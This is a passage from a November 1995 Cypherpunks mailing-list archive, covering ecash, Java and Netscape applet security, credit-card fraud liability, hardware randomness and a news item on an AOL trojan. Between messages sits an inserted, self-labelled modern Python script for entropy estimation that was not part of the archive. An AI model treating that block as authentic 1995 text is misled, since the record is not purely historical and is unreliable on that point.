--Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ddt at lsd.com Thu Nov 16 07:00:00 1995 From: ddt at lsd.com (Dave Del Torto) Date: Thu, 16 Nov 1995 23:00:00 +0800 Subject: e$: Financial Cryptography for Dogs, pt. 2. OpenDoc Kitchen, anyone? Message-ID: In Reply to the Message wherein it was written: [elided] >I've heard about something called an OpenDoc Kitchen, which is a periodic >>hack fest put on by Apple for developers of OpenDoc parts where code is >actually written. > >My understanding is that this will be held at Apple, in Cupertino, in >early December. That was at Apple in Cupertino, 11-13 NOVEMBER, not December. Whoops...I heard about it from Jose Carreon earlier and should have spoken up sooner, but there'll be another. Attendance by Marcel and/or Felix at such a "kitchen" would be an *excellent* idea. An OpenDoc-ish model will undoubtedly be the one many different OS designers (can you say "redmond?") at least copy someday for look and feel, so it would be smart for DigiCash/Ecash to be in on the early payment models. And anyway, Marcel could use a relaxing visit to sunny California so he can hand-lob a grenade at my house. ;) >They are especially interested in anyone from Digicash who would like to >make a digital cash OpenDoc component for Cyberdog, because I've been >ranting to them about this picture in my head of someone dragging digital >cash icons onto a register icon in a web browser to pay for a purchase. [elided] You're on _exactly_ the right track, Robert. I hope everybody listens to you.
As DC -- or perhaps whatever commercial client development company DC chooses to license the Ecash technology to for spreading this valuable-to-humanity technology far beyond the reach of "only" the big financial companies -- well knows, the version _after_ the next version of the Ecash client will have to be as easy to use as a smartcard if anyone really expects to [insert your favorite politically-sensitive verb here] the worldwide flow of value, perhaps making it more convenient for everyone. The register idea is an interesting one, but I think the belt coin-changer interface is more to the point, both graphically, and metaphorically. The non-expert Person in the Street (maybe even the street-people) will do very well with something like that. dave From froomkin at law.miami.edu Thu Nov 16 07:08:31 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Thu, 16 Nov 1995 23:08:31 +0800 Subject: Anonymity and Intellectual Capital In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com> Message-ID: For an earlier treatment of a related subject, see my: Anonymity and Its Enmities http://www.law.cornell.edu/jol/froomkin.htm A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From stewarts at ix.netcom.com Thu Nov 16 23:36:09 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 16 Nov 95 23:36:09 PST Subject: Java & Netscape security (reply to misc. 
postings) Message-ID: <199511170734.XAA12538@ix3.ix.netcom.com> At 11:33 AM 11/16/95 -0800, Marianne Mueller wrote: >I think it would be great if either of these two things were to magically happen: > > 1) people would stop putting postscript docs on web pages > because it's the wrong technology for WWW - it wastes > bandwidth - it's hard to view & hence often ugly - everyone > just prints it out anyway and then complains because there > is no one "standard" implementation of postscript printing > worldwide and there are dozens of minor problems Postscript is often a better model for applications like WWW - certainly more flexible than GIFs, and often smaller, for pictures that are composed of drawings or text-like objects rather than scanned photographs. You don't have to worry about resolution differences, jaggies, and ugliness - just compatibility and security and memory consumption :-). It's somewhat the difference between X and NeWS. I seldom print Postscript documents out; I view them with Ghostscript, though lack of a non-HP printer affects this... Viewing java docs on line, with the equations written as GIFs (without even an alternate text eqn or fortran form) is much tougher. > 2) someone could implement a secure postscript previewer > (whatever that means!) Yep. If you've got something that limits itself to making marks on virtual paper and modifying memory in well-defined areas, that's probably good enough. I'm hoping Java can do much the same job. ... > If you have data you can't >bear to lose, be sure to practice safe computing. Perform backups >regularly, and use judgement about which interpreters and executable >programs you allow to run on your PC. 
#-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 From rah at shipwright.com Thu Nov 16 07:48:43 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 16 Nov 1995 23:48:43 +0800 Subject: e$: Financial Cryptography for Dogs, pt. 2. OpenDoc Kitchen, anyone? Message-ID: >That was at Apple in Cupertino, 11-13 NOVEMBER, not December. The one I'm talking about *is* in fact in December, folks, Please contact me if you want to come, folks! Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From merriman at arn.net Thu Nov 16 08:01:40 1995 From: merriman at arn.net (David K. Merriman) Date: Fri, 17 Nov 1995 00:01:40 +0800 Subject: RSA-perl T-shirt Message-ID: <199511161547.JAA13166@arnet.arn.net> I've received several requests, and just want to let *everyone* know that the T-shirt I have that scanned was from Joel. I must confess that I don't know why it should make any difference, but..... Dave Merriman This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] ------------------- M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8 at X'HB_9H#&\X MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3 M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> My web page: http://www.geopages.com/CapitolHill/1148 From charles at europages.com Thu Nov 16 08:08:36 1995 From: charles at europages.com (charles at europages.com) Date: Fri, 17 Nov 1995 00:08:36 +0800 Subject: unsuscribe Message-ID: <9511161638.AA15806@europages.com> 'unsuscribe' From tcmay at got.net Thu Nov 16 10:32:00 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 17 Nov 1995 02:32:00 +0800 Subject: e$: Come aaaannnndddd Get it! Message-ID: At 12:18 PM 11/16/95, Robert Hettinga wrote: >At 8:57 PM 11/15/95, E. ALLEN SMITH wrote: >>------------------- >> I will as soon as someone comes up with a _fully_ private digital >>cash system and starts using it for something. As I understand it, Chaum's >>ecash system is not one (i.e., non-privacy to the sender and of amounts to the >>bank). If I'm incorrect, please tell me and I'll set up an account with MTB >>immediately (if there's a text-based interface). > >Ahhh. Next year in Jeresalem... > >Tell me, are you actually selling something on the net yet? How many >customers do you have? Bob, let me do a minor vent here. You are critical of E. Allen Smith's viewpoint, and essentially question whether he has anything to sell. Not much of an argument. Especially when folks are urging that "people put their money where their mouth is" and get MTB accounts. Me, I don't plan to sign up for various reasons: 1. I'm not selling anything, and won't sign up just for "moral support." 
(I tried this once before, getting an AMIX account early on, and that system offered more of a chance for a 2-way market. Still, a waste of my time.) 2. I wish Mark Twain Bank well, but the success of the kinds of digital cash we hope to see will not likely hinge on the success of one particular operations, such as MTB. 3. The success of BankAmericard (later renamed Visa) came when real customers and real shops started to use it, not when early pioneers set themselves up as clearinghouses and whatnot. I have more interesting things to do, personally, than to be a pioneer so I can then have nothing to sell, and little to buy....when "interesting markets" start to appear, I'll look at it again. In any case, I wish all the pioneers well, and am happy to see Lucky Green's involvement. But when you urge people to be pioneers, and they express reservations or doubts about the system, attacking their motives or implying they have nothing to sell anyway is not too helpful. Just my views, but, then, I don't have any customers either. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From pjnesser at asgaard.rocket.com Thu Nov 16 10:57:19 1995 From: pjnesser at asgaard.rocket.com (Philip Nesser) Date: Fri, 17 Nov 1995 02:57:19 +0800 Subject: primality code Message-ID: <9511161826.AA10763@asgaard.rocket.com> -----BEGIN PGP SIGNED MESSAGE----- Can someone point me in the right direction for any archives of code to do primality testing? I would rather not have to write something from scratch.
- ---> Phil

pjnesser at rocket.com
(206)885-5010x5477 (voice)
(206)882-5750 (fax)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKuBCjeDb3D8TcGFAQGHyAQAg8SXnZrIpQuWznlLxFS0uU0YM5mhwtXj
aG1qtts2vpOzbcNsIyV2zfx01yniOL5E7JycbQWUXJPmN0hRNxCovLWBL2rRJyrQ
KqdVUmaOa7RQqtW/Zx7qyCF3jPG0UZJe4KAJg6InwK6Ts3MS9e57Ft0T5iQG6Ygd
pb1f7+aiEE0=
=NYh0
-----END PGP SIGNATURE-----

From cme at TIS.COM Thu Nov 16 11:34:41 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 17 Nov 1995 03:34:41 +0800
Subject: Hardware-random-bits interface
In-Reply-To: <199511152205.OAA27271@comsec.com>
Message-ID: <9511161835.AA00247@tis.com>

>Date: Tue, 14 Nov 1995 14:31:46 -0800
>From: Peter Monta

>A rate of 300 kB/s will make a 600 MB one-time pad in an hour
>(assuming software is similarly fast). I'm wondering if any
>of the mail systems have convenient hooks to use pads (though
>it would not be difficult to write up).
>
>Suggestions welcome. I'll put the design on the Web
>once it's finished; replicating it should be pretty easy.
>People can also grab the device driver if they wish.

I'd be nervous about using a radio receiver which can be fed with a signal
by the adversary. A noisy resistor or diode should be less subject to bias
by an active opponent.

Whatever you use for a source of bits, it should be carefully measured to
determine how much real entropy is in the source. Don't assume all the bits
you get are independent, flat distribution bits. You might need to hash
bits down until you get independence. You also might want to provide some
further ranno conditioning.

cf. http://www.clark.net/pub/cme/P1363/ranno.html (on ranno theory)
and http://www.clark.net/pub/cme/html/ranno.html (on conditioning)

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison   cme at tis.com   http://www.clark.net/pub/cme           |
|Trusted Information Systems, Inc.  http://www.tis.com/                    |
|3060 Washington Road           PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738   Tel:(301)854-6889   FAX:(301)854-5363                 |
+--------------------------------------------------------------------------+

From vznuri at netcom.com Thu Nov 16 11:42:02 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 17 Nov 1995 03:42:02 +0800
Subject: credit card conventional wisdom
In-Reply-To:
Message-ID: <199511161848.KAA06931@netcom3.netcom.com>

>> I was attacking the line of thought
>> that goes, "credit card security is already marginal, therefore why
>> should anyone try to improve it in cyberspace"? this is circular
>> reasoning. "why should anyone try to make something more secure when
>> it is already insecure?"
>>
>In my post I am looking at this from an economics point of view. Simply
>put: If there is unlimited liability to the credit card holder because
>Mallet is stealing card numbers from the telco switch, encrypted, plain text,
>it doesn't matter, there will be no users. If there are no users then
>there will be no transaction fees generated, no transaction fees, then it
>won't be deployed. Therefore, there is no reason to develop the code
>or even read the latest and greatest specs. and we are all wasting our
>time.

I don't believe legal liability is the issue. many businesses operate
despite the fact that they have large liability for what they perform.
the issue is balancing the cost they are guaranteed through their
charges with the liability they face.

you are incorrect in thinking that individual credit card users buy
credit cards based on the liability to themselves, from my point of
view. individuals, even if they are theoretically liable for large
fraud costs, simply are not going to be able to be held accountable
for them.

you seem to be saying that if credit card companies one day guaranteed
they would be responsible for all fraud charges, we would have
cybercash *now*.
but credit card companies already do largely have to absorb the
costs of fraud. they are *already* liable.

and again, I don't think you will find the market really cares about
liability prior to using the service. the individual generally assumes
they are not personally responsible for fraud in the card, and the
companies generally have to adhere to this paradigm.

what if tomorrow a new credit card company started up saying, "we are
not responsible for fraud. all fraud is the responsibility of the
customer?" they would be laughed off the planet. such a plan is not
even feasible. the consumer will simply cancel the credit card if they
perceive they are being charged for fraud, and not pay the company
insisting they are not liable (despite whatever agreement they signed).

>We must recognize that no matter what code we write, how secure it is,
>it won't be used until the banks that must clear the transactions
>agree to accept the risks of loss in return for their transactions fees.

but this has *always* been the case. how is it not the case now?
*all* banks are liable for the security of their schemes. why do you
think they are not? why do you think they care so much about security?

>I haven't seen this from any of this consortiums and would like besides
>publishing their specs for the best system agree that this risk bearing
>is a necessary step for electronic commerce to become a reality.

why do you think that nobody does not already realize this? isn't it
patently obvious to anyone who starts such a system?

>I would like to see members of the MasterCard and Visa coalitions comment
>on this aspect of the systems that are promulgating. The one who cracks
>this nut first without losing their shirt to Mallet will be the winner. The
>others that expect us to deploy systems based upon if Mallet breaks the
>system, the cardholder and or merchant pays is wasting our time.

who is proposing that consumers or merchants pay if a system is broken?
why do you think that this is the case? what is more likely is that
these fraud costs will be hidden in transaction charges, just like they
are with current credit cards. the individual consumers and merchants
will then be given the "illusion" that they are not paying for fraud,
but this cost is actually invisibly included in their "transaction tax".

for the above reasons I don't at all understand why you insist that
acceptance of liability is the problem delaying introduction of digital
cash standards.

but one distinction I do realize has to be made in all this is the
difference between "fraud" and "breaking a system". the latter is a far
more potentially serious problem with cryptographic security than the
former. in fact cryptographic security attempts to deal with all fraud
by making "breaking the system" impossible, and succeeds to the degree
it accomplishes this.

From vznuri at netcom.com Thu Nov 16 12:39:59 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Fri, 17 Nov 1995 04:39:59 +0800
Subject: credit card conventional wisdom (fwd)
In-Reply-To:
Message-ID: <199511161923.LAA10460@netcom3.netcom.com>

>Card Imprints taken with no online authorisation are typically charged a
>transaction fee of 3-6%: with authorisation, 1.5-3%. ATM card
>transactions are charged at around $0.10 per transaction.

are you saying that a typical mail order credit card transaction has a
3-6% charge, because the card is not physically present? this is a
rather shockingly high rate.

again, what I have been calling the "fraud tax"-- it's hidden in every
purchase we make, and when we increase credit card security it will
increasingly be dissipated. but the problem is that no one realizes
this in general, and will argue, "why should we do anything to prevent
fraud? we are already not paying for it right now, why should credit
card companies spend any money to prevent it?"
BZZZZZZZT

I suspect these invisible fraud taxes are quite significant in general
and someone could really become very wealthy by inventing a system that
decreased them. you might increasingly see retailers offer a "safe card
discount"-- some brand of credit card charges them less transaction
overhead, and they pass these savings onto the customer. or, the credit
card company could send the money back to you like Discover does.

From jpp at software.net Thu Nov 16 12:56:22 1995
From: jpp at software.net (John Pettitt (John Pettitt))
Date: Fri, 17 Nov 1995 04:56:22 +0800
Subject: credit card conventional wisdom
Message-ID: <199511161930.LAA20815@software.net>

At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:

> ... about credit card liability

Hmmm, a few words about credit card liability.

The situation now is that in a "card not present" transaction the merchant is
liable for the fraud. This means that *a lot* of internet based stores are
getting eaten alive by fraud. The big issue right now is not cards being
stolen from the telco switch (yes it's a risk but can anybody cite it
happening?).
The issue is authentication of the card user. We have a significant
investment in
AI / credit scoring code to defeat the wannabe crackers. This goes way beyond
mod 10 checks and address verification.

[ as an aside I've put two people in jail this year for card fraud ]

John
John Pettitt, jpp at software.net
VP Engineering, CyberSource Corporation, 415 473 3065

From mrm at netcom.com Thu Nov 16 13:04:49 1995
From: mrm at netcom.com (Marianne Mueller)
Date: Fri, 17 Nov 1995 05:04:49 +0800
Subject: Java & Netscape security (reply to misc. postings)
Message-ID: <199511161933.LAA18504@netcom20.netcom.com>

Hi Harry & Perry & Jeff & Dr Cohen & "Alice" -

1. Netscape security:

Like Jeff said, Netscape 2.0beta has all the same security features as
JDK beta. (JDK = Java Developer's Kit, the name for our current
product.)
Netscape and Sun have been cooperating closely to
implement, and test, and document the applet security model.

The applet security manager and the applet class loader are
implemented at the Java layer, for which source code is available from
Sun. Granted, some elements of the applet security model are
implemented at the Java<-->runtime level, and that's why we have tests
that we run on the appletviewer and on Netscape Navigator.

2. Corporate security class:

Harry asks:

| My question is, can a corporate user replace the security class in
| Netscape. I understand that all the class libs are in an external
| file. While a virus might exploit this... my reason for asking is for
| corporate developers who are building "intra"net systems.. making some
| tweaks to the security class would give them the flexibility they need.
| Otherwise we have taken much of the fun out of Java. (for good
| reasons).

The best thing to do if you want to implement your own
intra-corporation security model in the short run is to get a copy of
the beta source code, and take a look at AppletSecurity.java and
AppletClassLoader.java. You can substitute your own versions of those
for your inhouse use. This is relatively easy to do with the
appletviewer, and although it's possible to do some binary hack on
moz2_0.car and replace certain files with your own, it's probably not
everyone's cup of tea. I mean, there's a difference between what you
can do, and what you want to do ... I understand that!

For the next release, we are working on how to enable people to
accomplish what you want to accomplish, in a standard way and in a
usable way, which preserves the applet security model. The goal is to
design the APIs so that applets can have access to more system
functionality in a secure way. Presumably what you really want to do
is write applets that have access to file i/o (or what have you), not
re-implement the security manager.

3. Postscript considered dangerous: (insert-smiley)

As for the question of someone invoking a postscript interpreter via a
browser and thus opening up their system to some rogue postscript
file: I think it would be great if either of these two things were to
magically happen:

    1) people would stop putting postscript docs on web pages
       because it's the wrong technology for WWW - it wastes
       bandwidth - it's hard to view & hence often ugly - everyone
       just prints it out anyway and then complains because there
       is no one "standard" implementation of postscript printing
       worldwide and there are dozens of minor problems

    2) someone could implement a secure postscript previewer
       (whatever that means!)

I doubt either of those two things will happen. The average Jo on the
internet needs to understand that when s/he downloads binary files
over the internet and run them from insecure programs on their local
computer, well, s/he runs some risk. This risk might be tiny, but
it's impossible to quantify loss. If I lose a poem that I'm writing,
to me that's priceless, so I do not intend to imply that loss of data
isn't tragic for the person who loses it. If you have data you can't
bear to lose, be sure to practice safe computing. Perform backups
regularly, and use judgement about which interpreters and executable
programs you allow to run on your PC.

Marianne
--
internet fan, mrm at netcom.com
Java Products Group, mrm at eng.sun.com

From nobody at REPLAY.COM Thu Nov 16 13:44:20 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Fri, 17 Nov 1995 05:44:20 +0800
Subject: Evil Mail
Message-ID: <199511160420.FAA07007@utopia.hacktic.nl>

WSJ, November 15, 1995

America Online to Warn Users About Bad E-Mail

Vienna, Va. -- It's a case of myth becoming reality in the
digital age. America Online Inc. plans to warn subscribers of
a damaging piece of electronic mail that could corrupt their
computers' hard drives.
The existence of the destructive file follows a long-term hoax
that has been dogging AOL for months. Last year, a user began
circulating a warning about a "Good Times" virus that would
crash users' PCs if they so much as read the piece of
electronic mail. AOL, the Federal Communications Commission
and the Pentagon repeatedly had to label the alleged virus a
hoax.

But the new file is all too real. The destructive file,
attached to electronic mail, has been circulated through the
on-line service and the Internet. Receiving the e-mail
wouldn't harm a user's computer, but trying to run the
attached file, known as AOL Gold or "install.exe," could
render a hard drive inoperable, an AOL spokeswoman said.

The company said it has notified various computer-security
agencies about the program. AOL also plans to post a letter
for its four million users strongly urging them to forgo
"downloading attached files from people you don't know."

Security experts fear that such Trojan Horses will proliferate
as programs become easier to attach to electronic mail and the
use of networks grows.

-----

From EALLENSMITH at ocelot.Rutgers.EDU Thu Nov 16 13:49:43 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Fri, 17 Nov 1995 05:49:43 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <01HXPQLC7L688WY0D1@mbcl.rutgers.edu>

Incidentally, I would like to apologize if I am going over (and not
contributing anything new to) discussion that has already taken place. If
anyone has or knows of an archive of the earlier list messages on the subject
(before I subscribed), I would like to read over them.

From: tcmay at got.net at 16-NOV-1995 13:00:29.05:

At 12:18 PM 11/16/95, Robert Hettinga wrote:
>
>Ahhh. Next year in Jerusalem...
-----------
Although I am unfortunately not completely familiar with this phrase, I
believe that your meaning here may be that I may be too much of an idealist.
My position is that I will not use a digital cash system with the significant
deficits in privacy that the ecash system has. The only exception to this
stance would be if it becomes plain that it is the only alternative to a
credit card system.

Admittedly, as has been pointed out to me in private email, some degree of
increased privacy in the ecash system can be gotten via changing currencies
using ecash. An example would be dollars to yen through one changer and back
again through another.

However, I will not regard a digital cash system as truly good until it has
the following traits:

A. Private to any combination except all three of bank, sender, and receiver.

B. The bank does not know the amount transacted or owned, unless it is the
sender or receiver. (Obviously, it will know the total amount of digital cash
of its issuance in existence, and how much it has received from or sent to
each person, but it should not need to know anything more).

C. Double spending is detectable, but does not reveal the identity of the
individual. Thus, the bank does not need to know the identity of the
individual when issuing the digital cash.

The following are desirable but not strictly necessary characteristics:

A. Offline transactions are possible. To detect double spending, a
transaction with the bank will probably be necessary, but this should ideally
be postponable until the goods purchased are shipped.

B. Mathematical as opposed to computational authentication and privacy. Since
I am neither a mathematician nor a programmer, I am uncertain about whether
this last is possible. I have my doubts.
--------------
>Tell me, are you actually selling something on the net yet? How many
>customers do you have?
--------------
If A. such a system as the above were set up and B. I had available any
computer programs, etcetera necessary to use it, then I would at least _try_
selling something on the net.
This something would be not data itself, but true information- data with
interpretations. I am qualified to produce such a service in some areas in
biology and medicine. I am currently in a Ph.D. program in Molecular Genetics
and Microbiology, and my chief area of interest is gene therapy- I have thus
learned some things about human physiology. Perhaps more importantly than my
own knowledge and experience, I know who to ask and have such individuals
available. Admittedly, I would have to fit it into the time between exams, or
more likely between semesters.
--------------
Bob, let me do a minor vent here. You are critical of E. Allen Smith's
viewpoint, and essentially question whether he has anything to sell. Not
much of an argument.
---------------
Thank you. (I would say "Thank you for your support," but my name is neither
Bartles (sp?) or James.)
---------------
Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts. Me, I don't plan to sign up for various
reasons:

1. I'm not selling anything, and won't sign up just for "moral support."
(I tried this once before, getting an AMIX account early on, and that
system offered more of a chance for a 2-way market. Still, a waste of my
time.)
---------------
I tried signing up for AMIX also, but unfortunately came in too late (after
it closed down). I might consider signing up for a system with the
characteristics described above for "moral support," but I will not do so for
a system that I hope is replaced by a better one.
---------------
2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one particular
operations, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.
---------------
Online commerce systems can be divided into four types, of increasing level
of desirability (and decreasing level of governmental approval):

A. Credit-card based systems such as credit card number encryption and First
Virtual.

B. Partially privacy-protecting systems such as ecash.

C. Fully privacy-protecting systems with the characteristics described above,
based on a governmental currency.

D. Fully privacy-protecting systems with the characteristics described above,
based on a privately-produced currency and backed by the issuer.

I suspect that the first and second will have the most aboveground chance of
succeeding, given likely governmental interference in the third and fourth;
lack of public comprehension of all of the digital cash systems and of
privately-produced currency will impede some of them also. However, the
fourth may be a possibility for an "underground" currency system, to be used
among computer-literate individuals with an aversion to government. I am
currently creating an idea for a system of the fourth type, and will put it
on the exi-essay list when it is complete.

Incidentally, I suspect a privately-produced currency system may be harder to
regulate than a governmentally-produced currency system, especially if the
former is set up properly. I will explain further about this idea in the
aforementioned exi-essay system.
---------------
I have more interesting things to do, personally, than to be a pioneer so I
can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.
---------------
I also agree in wishing the "pioneers" well. The ecash system is definitely
preferable to one based on means such as credit cards.
-Allen

From ac at hawk.twinds.com Thu Nov 16 15:20:28 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Fri, 17 Nov 1995 07:20:28 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID:

In this context is the merchant defined as the the corporation selling the
physical good for delivery or the corporation that is operating the
server? These two parties under certain circumstances may be the same
party, but in this example let's assume they are separate entities.

If I am interpreting "internet based stores" in the proper context, the
cardholder and the bank have recourse against the company operating the
server. Is this correct?

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from ."

On Thu, 16 Nov 1995, John Pettitt wrote:

> At 10:48 AM 11/16/95 -0800, Vladimir Z. Nuri wrote:
>
> > ... about credit card liability
>
> Hmmm, a few words about credit card liability.
>
> The situation now is that in a "card not present" transaction the merchant is
> liable for the fraud. This means that *a lot* of internet based stores are
> getting eaten alive by fraud. The big issue right now is not cards being
> stolen from the telco switch (yes it's a risk but can anybody cite it
> happening?).
> The issue is authentication of the card user. We have a significant
> investment in
> AI / credit scoring code to defeat the wannabe crackers. This goes way beyond
> mod 10 checks and address verification.
>
> [ as an aside I've put two people in jail this year for card fraud ]
>
> John
> John Pettitt, jpp at software.net
> VP Engineering, CyberSource Corporation, 415 473 3065
>
>

From hallam at w3.org Thu Nov 16 15:31:12 1995
From: hallam at w3.org (hallam at w3.org)
Date: Fri, 17 Nov 1995 07:31:12 +0800
Subject: credit card conventional wisdom
In-Reply-To: <199511161930.LAA20815@software.net>
Message-ID: <9511162041.AA03234@zorch.w3.org>

>The situation now is that in a "card not present" transaction the merchant is
>liable for the fraud. This means that *a lot* of internet based stores are
>getting eaten alive by fraud.

This is not quite accurate. In the US there is that distinction, in the UK the
credit card co is responsible. For that reason the requirement that goods be
delivered to the billing address _ONLY_ is strictly enforced.

>[ as an aside I've put two people in jail this year for card fraud ]

Good to hear that!

Phill

From habs at warwick.com Thu Nov 16 16:23:02 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Fri, 17 Nov 1995 08:23:02 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <199511162114.QAA11306@cmyk.warwick.com>

> The best thing to do if you want to implement your own
> intra-corporation security model in the short run is to get a copy of
> the beta source code, and take a look at AppletSecurity.java and
> AppletClassLoader.java. You can substitute your own versions of those
> for your inhouse use. This is relatively easy to do with the
> appletviewer, and although it's possible to do some binary hack on
> moz2_0.car and replace certain files with your own, it's probably not
> everyone's cup of tea. I mean, there's a difference between what you
> can do, and what you want to do ... I understand that!

The real question here I had was.. can this be done in Netscape.. I
know it can be done in HotJava.
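
[Added example, not part of any message in this archive. It sketches the measurement Carl Ellison's "Hardware-random-bits interface" message above calls for: estimate how much entropy a raw source really delivers, then hash the bits down accordingly. The correlated test source, the most-common-value estimator, SHA-256 as the conditioner and the 2x safety margin are all assumptions of this example.]

```python
import hashlib
import math
import random
from collections import Counter

Z_99 = 2.576  # normal quantile for a 99% upper confidence bound on p_max


def sticky_bits(n, stay=0.9, seed=1995):
    """Constructed test source: every bit repeats its predecessor with
    probability `stay`, so 0s and 1s are balanced but far from independent."""
    rng = random.Random(seed)
    bit = rng.getrandbits(1)
    out = []
    for _ in range(n):
        if rng.random() >= stay:
            bit ^= 1
        out.append(bit)
    return out


def pack_bits(bits):
    """Pack 0/1 values into bytes, MSB first; a ragged tail is dropped."""
    usable = len(bits) - len(bits) % 8
    return bytes(
        sum(b << (7 - j) for j, b in enumerate(bits[i:i + 8]))
        for i in range(0, usable, 8)
    )


def mcv_min_entropy(samples):
    """Min-entropy per symbol from the most common value: -log2 of an upper
    confidence bound on the largest observed symbol probability."""
    n = len(samples)
    if n < 2:
        raise ValueError("need at least two samples")
    p_max = max(Counter(samples).values()) / n
    p_upper = min(1.0, p_max + Z_99 * math.sqrt(p_max * (1 - p_max) / (n - 1)))
    return max(0.0, -math.log2(p_upper))


def condition(raw, h_per_byte, margin=2.0):
    """Hash the raw bytes down: each 256-bit SHA-256 output consumes enough
    input to hold `margin` * 256 bits of *measured* entropy."""
    if h_per_byte <= 0:
        raise ValueError("source shows no entropy; refusing to emit output")
    need = math.ceil(256 * margin / h_per_byte)  # raw bytes per output block
    digests = [
        hashlib.sha256(raw[i:i + need]).digest()
        for i in range(0, len(raw) - need + 1, need)
    ]
    return need, b"".join(digests)


if __name__ == "__main__":
    bits = sticky_bits(200_000)
    raw = pack_bits(bits)
    naive = 8 * mcv_min_entropy(bits)   # pretends the bits are independent
    measured = mcv_min_entropy(raw)     # sees the dependence inside a byte
    need, pad = condition(raw, measured)
    print(f"naive estimate   : {naive:.2f} bits per raw byte")
    print(f"measured estimate: {measured:.2f} bits per raw byte")
    print(f"{need} raw bytes per 32-byte block, {len(pad)} conditioned bytes")
```

[The per-bit count makes this source look nearly perfect while the byte-level estimate shows roughly a quarter of that. A byte-level estimate still only sees dependence inside one byte; longer-range structure needs larger blocks or other estimators.]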

From fc at all.net Thu Nov 16 16:23:04 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Fri, 17 Nov 1995 08:23:04 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511161933.LAA18504@netcom20.netcom.com>
Message-ID: <9511162108.AA08466@all.net>

> 3. Postscript considered dangerous: (insert-smiley)
>
> As for the question of someone invoking a postscript interpreter via a
> browser and thus opening up their system to some rogue postscript
> file: I think it would be great if either of these two things were to
> magically happen:
>
> 1) people would stop putting postscript docs on web pages
> because it's the wrong technology for WWW - it wastes
> bandwidth - it's hard to view & hence often ugly - everyone
> just prints it out anyway and then complains because there
> is no one "standard" implementation of postscript printing
> worldwide and there are dozens of minor problems
>
> 2) someone could implement a secure postscript previewer
> (whatever that means!)
>
> I doubt either of those two things will happen. The average Jo on the
> internet needs to understand that when s/he downloads binary files
> over the internet and run them from insecure programs on their local
> computer, well, s/he runs some risk. This risk might be tiny, but
> it's impossible to quantify loss. If I lose a poem that I'm writing,
> to me that's priceless, so I do not intend to imply that loss of data
> isn't tragic for the person who loses it. If you have data you can't
> bear to lose, be sure to practice safe computing. Perform backups
> regularly, and use judgement about which interpreters and executable
> programs you allow to run on your PC.
>
> Marianne

It seems clear from this that Netscape, or at least Marianne who seems
to speak for Netscape, doesn't understand the protection issues that my
clients face. I will nevertheless forward this official Netscape line
to them so they can better understand why I tell them it is insecure.

--
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From sjb at universe.digex.net Thu Nov 16 16:29:40 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Fri, 17 Nov 1995 08:29:40 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To:
